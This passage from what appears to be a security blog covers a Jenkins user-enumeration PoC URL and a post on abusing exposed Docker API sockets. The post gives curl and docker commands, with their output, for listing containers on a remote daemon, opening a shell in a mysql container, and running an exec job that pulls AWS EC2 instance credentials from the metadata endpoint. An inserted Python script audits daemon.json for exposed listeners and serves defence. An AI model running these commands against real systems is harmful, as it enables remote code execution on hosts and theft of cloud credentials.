<li><span style="color: #444444; font-family: "times" , "times new roman" , serif;">versions up to (including) 2.83</span></li>
</ul>
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><br /></span>
<span style="background-color: white; color: #444444; font-family: "times" , "times new roman" , serif; font-size: 1.25em;">PoC:</span><br />
<pre style="background-color: #f8f8f8; border-radius: 5px; border: 0px; box-sizing: border-box; font-size: 0.9em; line-height: 1.45; margin-bottom: 1.1em; overflow-wrap: break-word; padding: 10px 20px; white-space: pre-wrap;"><code style="background-color: transparent; border-radius: 0px; box-sizing: border-box; font-size: inherit; padding: 0px;"><span style="color: #444444; font-family: "times" , "times new roman" , serif;">http://jenkins.local/securityRealm/user/admin/api/xml</span></code></pre>
<span style="color: #444444; font-family: "times" , "times new roman" , serif;">With 2.137 you can get the username/id:</span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4bN6TWMKFqbxwji4ChXqm-5o7Dd4x5bxx9mXpWj8TahGbNCbWnv-pYCbSDr_bFXu7gtNYe7XeFvEakKlRZmEB2rb5SmONmjriulq3r1ejsoQ-kHaDTwwb3IkLbYw9nxs77PNZZZveVsY/s1600/Screen+Shot+2019-02-25+at+3.00.13+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="color: #444444; font-family: "times" , "times new roman" , serif;"><img border="0" data-original-height="385" data-original-width="1600" height="152" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4bN6TWMKFqbxwji4ChXqm-5o7Dd4x5bxx9mXpWj8TahGbNCbWnv-pYCbSDr_bFXu7gtNYe7XeFvEakKlRZmEB2rb5SmONmjriulq3r1ejsoQ-kHaDTwwb3IkLbYw9nxs77PNZZZveVsY/s640/Screen+Shot+2019-02-25+at+3.00.13+PM.png" width="640" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="color: #444444; font-family: "times" , "times new roman" , serif;">/securityRealm/user/cg/api/xml</span></td></tr>
</tbody></table>
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><br /></span>
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><br /></span>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8539880144347728238.post-84362251232816310922019-02-01T08:32:00.002-05:002019-02-01T08:43:04.312-05:00Abusing Docker API | Socket<span style="color: #444444;">Notes on abusing open Docker sockets</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">This won't cover breaking out of Docker containers.</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">Ports: usually 2375 &amp; 2376, but they can be anything.</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">Refs:</span><br />
<span style="color: #444444;"><br /></span>
<a href="https://blog.sourcerer.io/a-crash-course-on-docker-learn-to-swim-with-the-big-fish-6ff25e8958b0" target="_blank"><span style="color: #444444;">https://blog.sourcerer.io/a-crash-course-on-docker-learn-to-swim-with-the-big-fish-6ff25e8958b0</span></a><br />
<a href="https://www.slideshare.net/BorgHan/hacking-docker-the-easy-way" target="_blank"><span style="color: #444444;">https://www.slideshare.net/BorgHan/hacking-docker-the-easy-way</span></a><br />
<a href="https://blog.secureideas.com/2018/05/escaping-the-whale-things-you-probably-shouldnt-do-with-docker-part-1.html" target="_blank"><span style="color: #444444;">https://blog.secureideas.com/2018/05/escaping-the-whale-things-you-probably-shouldnt-do-with-docker-part-1.html</span></a><br />
<a href="https://blog.secureideas.com/2018/08/escaping-the-whale-things-you-probably-shouldnt-do-with-docker-part-2.html" target="_blank"><span style="color: #444444;">https://blog.secureideas.com/2018/08/escaping-the-whale-things-you-probably-shouldnt-do-with-docker-part-2.html</span></a><br />
<a href="https://infoslack.com/devops/exploring-docker-remote-api" target="_blank"><span style="color: #444444;">https://infoslack.com/devops/exploring-docker-remote-api</span></a><br />
<a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Cherny-Well-That-Escalated-Quickly-How-Abusing-The-Docker-API-Led-To-Remote-Code-Execution-Same-Origin-Bypass-And-Persistence_wp.pdf" target="_blank"><span style="color: #444444;">https://www.blackhat.com/docs/us-17/thursday/us-17-Cherny-Well-That-Escalated-Quickly-How-Abusing-The-Docker-API-Led-To-Remote-Code-Execution-Same-Origin-Bypass-And-Persistence_wp.pdf</span></a><br />
<a href="https://raesene.github.io/blog/2016/03/06/The-Dangers-Of-Docker.sock/" target="_blank"><span style="color: #444444;">https://raesene.github.io/blog/2016/03/06/The-Dangers-Of-Docker.sock/</span></a><br />
<a href="https://cert.litnet.lt/2016/11/owning-system-through-an-exposed-docker-engine/" target="_blank"><span style="color: #444444;">https://cert.litnet.lt/2016/11/owning-system-through-an-exposed-docker-engine/</span></a><br />
<a href="https://medium.com/@riccardo.ancarani94/attacking-docker-exposed-api-3e01ffc3c124" target="_blank"><span style="color: #444444;">https://medium.com/@riccardo.ancarani94/attacking-docker-exposed-api-3e01ffc3c124</span></a><br />
<a href="https://www.exploit-db.com/exploits/42356" target="_blank"><span style="color: #444444;">https://www.exploit-db.com/exploits/42356</span></a><br />
<a href="https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/docker_daemon_tcp.rb" target="_blank"><span style="color: #444444;">https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/docker_daemon_tcp.rb</span></a><br />
<a href="http://blog.nibblesec.org/2014/09/abusing-dockers-remote-apis.html" target="_blank"><span style="color: #444444;">http://blog.nibblesec.org/2014/09/abusing-dockers-remote-apis.html</span></a><br />
<a href="https://www.prodefence.org/knock-knock-docker-will-you-let-me-in-open-api-abuse-in-docker-containers/" target="_blank"><span style="color: #444444;">https://www.prodefence.org/knock-knock-docker-will-you-let-me-in-open-api-abuse-in-docker-containers/</span></a><br />
<a href="https://blog.ropnop.com/plundering-docker-images/" target="_blank"><span style="color: #444444;">https://blog.ropnop.com/plundering-docker-images/</span></a><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">Enable the Docker socket (to create a practice environment):</span><br />
<a href="https://success.docker.com/article/how-do-i-enable-the-remote-api-for-dockerd" target="_blank"><span style="color: #444444;">https://success.docker.com/article/how-do-i-enable-the-remote-api-for-dockerd</span></a><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">Having the Docker API or socket exposed is essentially granting root access to any of the containers on the system.</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">The daemon listens on unix:///var/run/docker.sock but you can bind Docker to another host/port or a Unix socket.</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">The Docker socket is the socket the Docker daemon listens on by default. It can be used to communicate with the daemon from within a container or, if so configured, from outside the container against the host running Docker.</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">All the Docker socket magic happens via the Docker API. For example, if we wanted to spin up an nginx container we'd do the following:</span><br />
<span style="color: #444444;"><br /></span>
<b><span style="color: #444444;">Create a nginx container</span></b><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">The following command uses curl to send the {"Image":"nginx"} payload to the /containers/create endpoint of the Docker daemon through the Unix socket. This creates a container based on nginx and returns its ID.</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">$ curl -XPOST --unix-socket /var/run/docker.sock -d '{"Image":"nginx"}' -H 'Content-Type: application/json' http://localhost/containers/create</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">{"Id":"fcb65c6147efb862d5ea3a2ef20e793c52f0fafa3eb04e4292cb4784c5777d65","Warnings":null}</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">Start the container</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> $ curl -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/fcb65c6147efb862d5ea3a2ef20e793c52f0fafa3eb04e4292cb4784c5777d65/start</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">As mentioned above, you can also have the Docker socket listen on a TCP port.</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">You can validate that it's Docker by hitting it with a version request:</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> $ curl -s http://open.docker.socket:2375/version | jq</span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">{</span></span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Version": "1.13.1",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "ApiVersion": "1.26",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "MinAPIVersion": "1.12",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "GitCommit": "07f3374/1.13.1",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "GoVersion": "go1.9.4",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Os": "linux",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Arch": "amd64",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "KernelVersion": "3.10.0-514.26.2.el7.x86_64",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "BuildTime": "2018-12-07T16:13:51.683697055+00:00",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "PkgVersion": "docker-1.13.1-88.git07f3374.el7.centos.x86_64"</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">}</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;"> or with the docker client</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">docker -H open.docker.socket:2375 version</span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> Server:</span></span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> Engine:</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> Version: 1.13.1</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> API version: 1.26 (minimum version 1.12)</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> Go version: go1.9.4</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> Git commit: 07f3374/1.13.1</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> Built: Fri Dec 7 16:13:51 2018</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> OS/Arch: linux/amd64</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> Experimental: false</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">This is basically a shell into the container</span><br />
<span style="color: #444444;"><br /></span>
<b><span style="color: #444444;">Get a list of running containers with the ps command</span></b><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">docker -H open.docker.socket:2375 ps</span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES</span></span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">72cd30d28e5c gogs/gogs "/app/gogs/docker/st…" 5 days ago Up 5 days 0.0.0.0:3000->3000/tcp, 0.0.0.0:10022->22/tcp gogs</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">b522a9034b30 jdk1.8 "/bin/bash" 5 days ago Up 5 days myjdk8</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;"><b>0f5947860c17 centos/mysql-57-centos7 "container-entrypoin…" 8 days ago Up 8 days 0.0.0.0:3306->3306/tcp mysql</b></span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">3965c004c7a7 192.168.32.134:5000/tensquare_config:1.0-SNAPSHOT "java -jar /app.jar" 8 days ago Up 8 days 0.0.0.0:12000->12000/tcp config</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">3f466b754971 42cb59080921 "/bin/bash" 8 days ago Up 8 days jdk8</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">6499013fdc2d registry "/entrypoint.sh /etc…" 8 days ago Up 8 days 0.0.0.0:5000->5000/tcp registry</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">Exec into one of the containers</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">docker -H open.docker.socket:2375 exec -it mysql /bin/bash</span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">bash-4.2$ whoami</span></span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">mysql</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">Other commands</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">Are there some stopped containers?</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">docker -H open.docker.socket:2375 ps -a</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">What are the images pulled on the host machine?</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">docker -H open.docker.socket:2375 images</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">I've frequently not been able to get the docker client to work well when it comes to the exec command, but you can still get code exec in the container with the API. The example below uses curl to interact with the API over HTTPS (if enabled): create an exec job, set up the variable to receive the output, and then start the exec so you can get the output.</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;"><br /></span>
<b><span style="color: #444444;">Using curl to hit the API</span></b><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">Sometimes you'll see 2376 up for the TLS endpoint. I haven't been able to connect to it with the docker client, but you can hit the Docker API with curl no problem.</span><br />
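<span style="color: #444444;">As an added example (not code from the original post), the Python script below audits a dockerd daemon.json for the exposures described above: a plaintext tcp:// listener, a TLS listener without tlsverify (the 2376 case that curl --insecure can talk to, since the server never asks for a client certificate), and a tlsverify listener. The sample daemon.json contents are constructed for the demo; the keys it reads ("hosts", "tls", "tlsverify") are dockerd's own.</span><br />

```python
"""Audit a dockerd daemon.json for exposed API listeners.

Added example, not code from the original post. It reads the "hosts",
"tls" and "tlsverify" keys that dockerd accepts in daemon.json and
classifies each listener: a plaintext tcp:// listener hands root-equivalent
API access to anyone who can reach it, a TLS listener without tlsverify
(the 2376 case that curl --insecure can talk to) encrypts the connection
but authenticates nobody, and only tlsverify enforces client certificates.
"""
import json
from urllib.parse import urlsplit

# dockerd's own defaults when no port is given in a tcp:// host entry.
DEFAULT_HTTP_PORT = 2375
DEFAULT_TLS_PORT = 2376

# Constructed sample daemon.json contents for the demo; not taken from any real host.
SAMPLES = {
    "default": "{}",
    "open_tcp": '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}',
    "loopback_tcp": '{"hosts": ["tcp://127.0.0.1"]}',
    "tls_no_client_auth": (
        '{"hosts": ["tcp://0.0.0.0"], "tls": true, '
        '"tlscert": "/etc/docker/server.pem", "tlskey": "/etc/docker/server-key.pem"}'
    ),
    "tls_verify": (
        '{"hosts": ["tcp://0.0.0.0:2376"], "tlsverify": true, '
        '"tlscacert": "/etc/docker/ca.pem", '
        '"tlscert": "/etc/docker/server.pem", "tlskey": "/etc/docker/server-key.pem"}'
    ),
}

SEVERITY_RANK = {"info": 0, "low": 1, "medium": 2, "high": 3, "critical": 4}


def classify_listener(host: str, cfg: dict) -> tuple:
    """Return (severity, reason) for one entry of the daemon.json "hosts" list."""
    parts = urlsplit(host)
    if parts.scheme in ("unix", ""):
        return ("info", f"{host}: local socket; exposure depends on its file mode "
                        "and on which containers get it bind-mounted")
    if parts.scheme == "fd":
        return ("info", f"{host}: systemd socket activation; check ListenStream in the .socket unit")
    if parts.scheme != "tcp":
        return ("high", f"{host}: unrecognised scheme {parts.scheme!r}; review manually")

    tlsverify = bool(cfg.get("tlsverify"))
    tls = tlsverify or bool(cfg.get("tls"))
    bind_host = parts.hostname or "0.0.0.0"
    port = parts.port or (DEFAULT_TLS_PORT if tls else DEFAULT_HTTP_PORT)
    wildcard = bind_host in ("0.0.0.0", "::")

    if tlsverify:
        return ("medium" if wildcard else "low",
                f"{host}: TLS with client verification on port {port}; still root-equivalent "
                "for any holder of a CA-signed client cert, so guard the CA key")
    if tls:
        return ("critical", f"{host}: TLS on port {port} but no tlsverify; encrypted yet "
                            "unauthenticated, any client can call the API")
    if wildcard:
        return ("critical", f"{host}: plaintext API on port {port} bound to all interfaces; "
                            "root-equivalent for anyone who can reach it")
    return ("high", f"{host}: plaintext API on {bind_host}:{port}; reachable by every local "
                    "process, including containers that use host networking")


def audit_daemon_json(text: str) -> list:
    """Parse daemon.json text and classify every configured listener."""
    cfg = json.loads(text)
    # dockerd listens on the unix socket only when "hosts" is absent.
    hosts = cfg.get("hosts") or ["unix:///var/run/docker.sock"]
    return [classify_listener(h, cfg) for h in hosts]


def worst_severity(findings: list) -> str:
    """Overall severity of an audit: the highest-ranked finding."""
    return max((sev for sev, _ in findings), key=SEVERITY_RANK.__getitem__, default="info")


if __name__ == "__main__":
    for name, text in SAMPLES.items():
        findings = audit_daemon_json(text)
        print(f"[{worst_severity(findings):>8}] {name}")
        for sev, reason in findings:
            print(f"    {sev:<8} {reason}")
```

Point it at a real /etc/docker/daemon.json (and at the -H flags in the dockerd systemd unit, which override the file) to find the 2375/2376 listeners this post is about before someone else does.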
<span style="color: #444444;"><br /></span>
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">Docker socket to metadata URL</span><br />
<a href="https://docs.docker.com/engine/api/v1.37/#operation/ContainerExec" target="_blank"><span style="color: #444444;">https://docs.docker.com/engine/api/v1.37/#operation/ContainerExec</span></a><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">Below is an example of hitting the internal AWS metadata URL and getting the output.</span><br />
<span style="color: #444444;"><br /></span>
<b><span style="color: #444444;">list containers:</span></b><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">curl --insecure https://tls-opendocker.socket:2376/containers/json | jq</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">[</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> {</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Id": "f9cecac404b01a67e38c6b4111050c86bbb53d375f9cca38fa73ec28cc92c668",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Names": [</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "/docker_snip_1"</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> ],</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Image": "dotnetify",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "ImageID": "sha256:23b66a91f928ea6a49bce1be4eabedbafd41c5dfa4e76c1a94062590e54550ca",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Command": "cmd /S /C 'dotnet netify-temp.dll'",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Created": 1541018555,</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Ports": [</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> {</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "IP": "0.0.0.0",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "PrivatePort": 443,</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "PublicPort": 50278,</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">---SNIP---</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;"><br /></span>
<b><span style="color: #444444;">List processes in a container:</span></b><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">curl --insecure https://tls-opendocker.socket:2376/containers/f9cecac404b01a67e38c6b4111050c86bbb53d375f9cca38fa73ec28cc92c668/top | jq</span></span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> {</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Processes": [</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> [</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "smss.exe",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "7868",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "00:00:00.062",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "225.3kB"</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> ],</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> [</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "csrss.exe",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "10980",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "00:00:00.859",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "421.9kB"</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> ],</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> [</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "wininit.exe",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "10536",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "00:00:00.078",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "606.2kB"</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> ],</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> [</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "services.exe",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "10768",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "00:00:00.687",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "1.208MB"</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> ],</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> [</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "lsass.exe",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "10416",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "00:00:36.000",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "4.325MB"</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> ],</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> ---SNIP---</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;"><br /></span>
<b><span style="color: #444444;">Set up an exec job to hit the metadata URL:</span></b><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/blissful_engelbart/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "wget -qO- http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"]}'</span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">{"Id":"4353567ff39966c4d231e936ffe612dbb06e1b7dd68a676ae1f0a9c9c0662d55"}</span></span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">Get the output:</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/4353567ff39966c4d231e936ffe612dbb06e1b7dd68a676ae1f0a9c9c0662d55/start -d '{}'</span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">{</span></span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Code" : "Success",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "LastUpdated" : "2019-01-29T20:12:58Z",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Type" : "AWS-HMAC",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "AccessKeyId" : "ASIATRSNIP",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "SecretAccessKey" : "CD6/h/egYHmYUSNIPSNIPSNIPSNIPSNIP",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Token" : "FQoGZXIvYXdzEB4aDCQSM0rRV/SNIPSNIPSNIP",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Expiration" : "2019-01-30T02:43:34Z"</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">}</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;"><br /></span>
<b><span style="color: #444444;"> Docker secrets</span></b><br />
<span style="color: #444444;"> relevant reading <a href="https://docs.docker.com/engine/swarm/secrets/" target="_blank">https://docs.docker.com/engine/swarm/secrets/</a></span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;"><br /></span>
<span style="color: #444444;"> <b>list secrets (no secrets/swarm not set up)</b></span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> curl -s --insecure https://tls-opendocker.socket:2376/secrets | jq</span></span><br />
<span style="color: #444444;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> { "message": "This node is not a swarm manager. Use \"docker swarm init\" or \"docker swarm join\" to connect this node to swarm and try again."}</span></span><br />
<span style="color: #444444;"><br /></span>
<b><span style="color: #444444;"> list secrets (they exist)</span></b><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> $ curl -s --insecure https://tls-opendocker.socket:2376/secrets | jq</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> [</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> {</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "ID": "9h3useaicj3tr465ejg2koud5",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Version": {</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Index": 21</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> },</span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "CreatedAt": "2018-07-06T10:19:50.677702428Z",</span></span><br />
